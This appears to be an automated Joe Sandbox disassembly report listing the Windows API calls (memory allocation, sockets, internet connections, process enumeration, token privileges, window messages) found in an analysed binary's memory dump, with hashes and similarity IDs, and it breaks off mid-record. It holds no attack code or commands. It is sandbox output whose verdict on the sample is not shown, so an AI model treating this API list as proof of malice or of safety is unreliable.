                                                  • String ID:
                                                  • API String ID:
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E0BE
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E101
                                                    • Part of subcall function 00C3D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3D7C5
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C3E301
                                                  • _memmove.LIBCMT ref: 00C3E314
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C380C3
                                                  • CoUninitialize.OLE32 ref: 00C380CE
                                                    • Part of subcall function 00C1D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1D5D4
                                                  • VariantInit.OLEAUT32(?), ref: 00C380D9
                                                  • VariantClear.OLEAUT32(?), ref: 00C383AA
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C176EA
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17702
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00C4FB80,000000FF,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17727
                                                  • _memcmp.LIBCMT ref: 00C17748
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  APIs
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  APIs
                                                  • GetWindowRect.USER32(00EED778,?), ref: 00C49863
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00C49896
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C49903
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C19AD2
                                                  • __itow.LIBCMT ref: 00C19B03
                                                    • Part of subcall function 00C19D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00C19DBE
                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00C19B6C
                                                  • __itow.LIBCMT ref: 00C19BC3
                                                  Similarity
                                                  • API ID: MessageSend$__itow
                                                  • String ID:
                                                  • API String ID: 3379773720-0
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00C369D1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C369E1
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C36A45
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36A51
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C4F910), ref: 00C364A7
                                                  • _strlen.LIBCMT ref: 00C364D9
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C2B89E
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00C2B8C4
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C2B8E9
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C2B915
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C488DE
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: fc2306aaa786a74dd7cf780e0316bf75313c468d1caa842f9408a275ca435ec3
                                                  • Instruction ID: ba373d9c4dbfbe6196113eb21146127afc40be86664d7b3a0ff83d4ced16874c
                                                  • Opcode Fuzzy Hash: fc2306aaa786a74dd7cf780e0316bf75313c468d1caa842f9408a275ca435ec3
                                                  • Instruction Fuzzy Hash: 1E31E434A00508BFEF249B58CC85FBC77B5FB16320F944516FA25E62E1CE71EA889752
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00C4AB60
                                                  • GetWindowRect.USER32(?,?), ref: 00C4ABD6
                                                  • PtInRect.USER32(?,?,00C4C014), ref: 00C4ABE6
                                                  • MessageBeep.USER32(00000000), ref: 00C4AC57
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: cd49c6f56f0c2500b2d2ffcf8ab0f9dcc45e42a501b9013b52d4d8dfc7a5070c
                                                  • Instruction ID: 8022f9f8bdaa4d3b1313720333bc5eb9b9f77609b882881217704a12cb017123
                                                  • Opcode Fuzzy Hash: cd49c6f56f0c2500b2d2ffcf8ab0f9dcc45e42a501b9013b52d4d8dfc7a5070c
                                                  • Instruction Fuzzy Hash: 61418B35A80219DFCB51DF58D8C4BAD7BF5FB49310F1884A9E824DF2A1D732A941CB92
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BF61FB
                                                  • __isleadbyte_l.LIBCMT ref: 00BF6229
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF6257
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BF628D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: ad9d196702e1afea173a409e445b9f987f80044734e345d358b7b352ff1717c0
                                                  • Instruction ID: c542bd2f70c0cdbd213ceeb2e739651e407c23768b09b57b0be685ca3049859c
                                                  • Opcode Fuzzy Hash: ad9d196702e1afea173a409e445b9f987f80044734e345d358b7b352ff1717c0
                                                  • Instruction Fuzzy Hash: 0831CD3060024AAFDF218F65CC44BBA7BF9FF42310F1540A8ED24971A1E731E954DB90
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00C44F02
                                                    • Part of subcall function 00C23641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C2365B
                                                    • Part of subcall function 00C23641: GetCurrentThreadId.KERNEL32 ref: 00C23662
                                                    • Part of subcall function 00C23641: AttachThreadInput.USER32(00000000,?,00C25005), ref: 00C23669
                                                  • GetCaretPos.USER32(?), ref: 00C44F13
                                                  • ClientToScreen.USER32(00000000,?), ref: 00C44F4E
                                                  • GetForegroundWindow.USER32 ref: 00C44F54
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: a22752d2b912e351598b87634120f76a8be5bcd7b534a954eb0b98d3fc78d1b4
                                                  • Instruction ID: 6bbcd0e5791a759e6cf14d06497cedd499ad46630c93eae474f91a5dde3bb4b3
                                                  • Opcode Fuzzy Hash: a22752d2b912e351598b87634120f76a8be5bcd7b534a954eb0b98d3fc78d1b4
                                                  • Instruction Fuzzy Hash: 9C310B72D00108AFDB10EFA5C885EEFB7FDEF99300F1040AAE455E7241DA759E458BA0
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C23C7A
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C23C88
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C23CA8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C23D52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 27842416e90f253a2015e5296494c8396e65dc05020df89732767cf564ae1d79
                                                  • Instruction ID: 65c9e0e4817a8d7c10f97b2c514726498c0cf8cf38e52cf37a1d1194ff2ebda8
                                                  • Opcode Fuzzy Hash: 27842416e90f253a2015e5296494c8396e65dc05020df89732767cf564ae1d79
                                                  • Instruction Fuzzy Hash: 4831A2711083459FD310EF60D881FAFBBE8EF99354F50086DF591861A1EB719A4ACB62
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetCursorPos.USER32(?), ref: 00C4C4D2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BFB9AB,?,?,?,?,?), ref: 00C4C4E7
                                                  • GetCursorPos.USER32(?), ref: 00C4C534
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BFB9AB,?,?,?), ref: 00C4C56E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: 56a8b3d087dc2d5280a7e858616af2b1a660d79f755510d8a34df1e6cba73ecb
                                                  • Instruction ID: 886d1b2ebe50b7e6975e38b0c99c4d6e9b77f060633c537013607f141accd211
                                                  • Opcode Fuzzy Hash: 56a8b3d087dc2d5280a7e858616af2b1a660d79f755510d8a34df1e6cba73ecb
                                                  • Instruction Fuzzy Hash: D2319E35601018AFCB65CF98C898FBE7BB5FB09360F044069F9158B2B1C731AE51EBA4
                                                  APIs
                                                    • Part of subcall function 00C1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18121
                                                    • Part of subcall function 00C1810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C1812B
                                                    • Part of subcall function 00C1810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1813A
                                                    • Part of subcall function 00C1810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18141
                                                    • Part of subcall function 00C1810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18157
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C186A3
                                                  • _memcmp.LIBCMT ref: 00C186C6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C186FC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C18703
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 08d2cd33cefd052e84475263cd0840bfda79e2682893e337f0261cccfa5e8233
                                                  • Instruction ID: 80e70762f025aa0078674fdd4a3e2f6c9ab0708a3a257b31f4bef6d91f228e43
                                                  • Opcode Fuzzy Hash: 08d2cd33cefd052e84475263cd0840bfda79e2682893e337f0261cccfa5e8233
                                                  • Instruction Fuzzy Hash: FF217A72E04108EFDB10DFA8C959BEEB7B8EF46304F154099F454AB240DB31AE49EB90
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00BE09AE
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  • _fprintf.LIBCMT ref: 00BE09E5
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00C15DBB
                                                    • Part of subcall function 00BE4AAA: _flsall.LIBCMT ref: 00BE4AC3
                                                  • __setmode.LIBCMT ref: 00BE0A1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 3796dd25976de23816072e76a9dbd372d2ba945573d2a4608e094619b91c8a8d
                                                  • Instruction ID: c7f6c9d303bbcd71ed48954a16fe14f2bf3a3d7cca3e71bbd88d29c18fb7bab1
                                                  • Opcode Fuzzy Hash: 3796dd25976de23816072e76a9dbd372d2ba945573d2a4608e094619b91c8a8d
                                                  • Instruction Fuzzy Hash: F6116A315042886FDB04B7B6AC86EFE77E89F86320F1400E9F10557182EF70598653A0
                                                  APIs
                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C317A3
                                                    • Part of subcall function 00C3182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C3184C
                                                    • Part of subcall function 00C3182D: InternetCloseHandle.WININET(00000000), ref: 00C318E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID:
                                                  • API String ID: 1463438336-0
                                                  • Opcode ID: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
                                                  • Instruction ID: e73ad19d321f055ed60752bc280dc50eca3984adfda7843efc670edc6923c5a9
                                                  • Opcode Fuzzy Hash: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
                                                  • Instruction Fuzzy Hash: 19212335210601BFEB129F60CC00FBBBBA9FF49710F18002EFE1596690DB31D912A7A5
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00C4FAC0), ref: 00C23A64
                                                  • GetLastError.KERNEL32 ref: 00C23A73
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C23A82
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C4FAC0), ref: 00C23ADF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: 2002dec12459b9c14cda50d7e33bf6eeddadafa23667500e00c7c150004ade59
                                                  • Instruction ID: e47c87ec036c666676f09dbbc5a9fdf915f32c9f6cb506a9c31a9fa70e929226
                                                  • Opcode Fuzzy Hash: 2002dec12459b9c14cda50d7e33bf6eeddadafa23667500e00c7c150004ade59
                                                  • Instruction Fuzzy Hash: 7621B134108251DF8310DF28D88196B77E4BE5A364F104A7DF4A9C72A1DB35DE46DB52
                                                  APIs
                                                    • Part of subcall function 00C1F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?), ref: 00C1F0CB
                                                    • Part of subcall function 00C1F0BC: lstrcpyW.KERNEL32(00000000,?,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1F0F1
                                                    • Part of subcall function 00C1F0BC: lstrcmpiW.KERNEL32(00000000,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?), ref: 00C1F122
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DCEC
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DD12
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DD46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: ddc603037a1cdf091207c20d90d64bc28683c6161ce7d94177886acd58bcd0bb
                                                  • Instruction ID: e6b0cfae368cd6b2714939d806505912405c1af11a0ddbb05294a33dcadc38d3
                                                  • Opcode Fuzzy Hash: ddc603037a1cdf091207c20d90d64bc28683c6161ce7d94177886acd58bcd0bb
                                                  • Instruction Fuzzy Hash: 9E11B43A100305EBCB15AF34D845ABE77A5FF46350B40816AF816CB260EB719981E7A1
                                                  APIs
                                                  • _free.LIBCMT ref: 00BF5101
                                                    • Part of subcall function 00BE571C: __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BE571C: __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BE571C: RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: a29b2ea85c05596da77b49db5f5b923572b8289fefd5dd021e3ccd8f8cdfc73b
                                                  • Instruction ID: cc1f2449fcee680ae1b693aff3e7a732460c0dff01d4bdc13f9106edfc613be2
                                                  • Opcode Fuzzy Hash: a29b2ea85c05596da77b49db5f5b923572b8289fefd5dd021e3ccd8f8cdfc73b
                                                  • Instruction Fuzzy Hash: 02110672500A59AECB312FB5AC45B7E37D8EF01362F1005A9FB08BB162DF319A458790
                                                  APIs
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00C36399
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C363A4
                                                  • _memmove.LIBCMT ref: 00C363D1
                                                  • inet_ntoa.WSOCK32(?), ref: 00C363DC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 67700fbe3012aeace98ec40fe2c66250c84061c3a631962ea931ce178f0415ee
                                                  • Instruction ID: 42e1a81e98097cc6958f2c9074c0191fc60f5b68323059814c907d81180b16fe
                                                  • Opcode Fuzzy Hash: 67700fbe3012aeace98ec40fe2c66250c84061c3a631962ea931ce178f0415ee
                                                  • Instruction Fuzzy Hash: 81118276900109AFCB04FFA4DD46EEEB7F8BF09310B1441A9F505A71A2DB30AE54DB61
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C18B61
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18B73
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18B89
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18BA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                   • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
